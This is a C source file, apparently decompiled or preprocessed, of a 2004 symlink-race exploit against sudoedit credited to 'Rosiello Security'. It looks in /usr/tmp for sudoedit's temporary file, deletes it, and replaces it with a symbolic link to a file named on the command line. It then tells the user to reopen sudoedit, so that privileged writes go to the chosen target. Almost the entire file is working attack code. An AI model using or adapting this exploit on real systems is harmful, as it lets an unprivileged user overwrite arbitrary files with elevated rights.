
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct dirent {scalar_t__ d_name; } ;
typedef int DIR ;


 int closedir (int *) ;
 int execl (char*,char*,char*,char*,char*,int *) ;
 scalar_t__ fork () ;
 int * opendir (char*) ;
 int printf (char*,...) ;
 struct dirent* readdir (int *) ;
 int remove (char*) ;
 int sprintf (char*,char*,char*,char*) ;
 int strlen (scalar_t__) ;
 int * strstr (scalar_t__,char*) ;
 int wait () ;

int main( int argc, char *argv[] )
{
    char PATH[]="/usr/tmp";
    char file[32];
       DIR *tmp;
       struct dirent *de;
       tmp = opendir ( PATH );
    int found = 0;

    printf( "Copyright Â© Rosiello Security 2004\n" );
    printf( "http://www.rosiello.org\n" );

    if( argc!=2 )
    {
        printf( "USAGE: %s file\n", argv[0] );
        return( 0 );
    }


    while ( (de = readdir ( tmp ))!= ((void*)0) )
    {
        if ( (strstr(de->d_name, "rosiello") != ((void*)0)) )
           {
            if( strlen(de->d_name) > 24 ) return( 0 );
            sprintf( file, "%s/%s", PATH, (char *)de->d_name );
            remove( file );
            if( fork()!=0 )
            {
                execl( "/bin/ln", "ln", "-s", argv[1], file, ((void*)0) );
            }
            wait( );
            printf( "Now you can close sudoedit and reopen rosiello!\n" );
            found=1;
            goto end;

        }

       }
    end:
    closedir( tmp );

    if( !found )
        printf( "File Not Found!\n" );
    return( 0 );

}
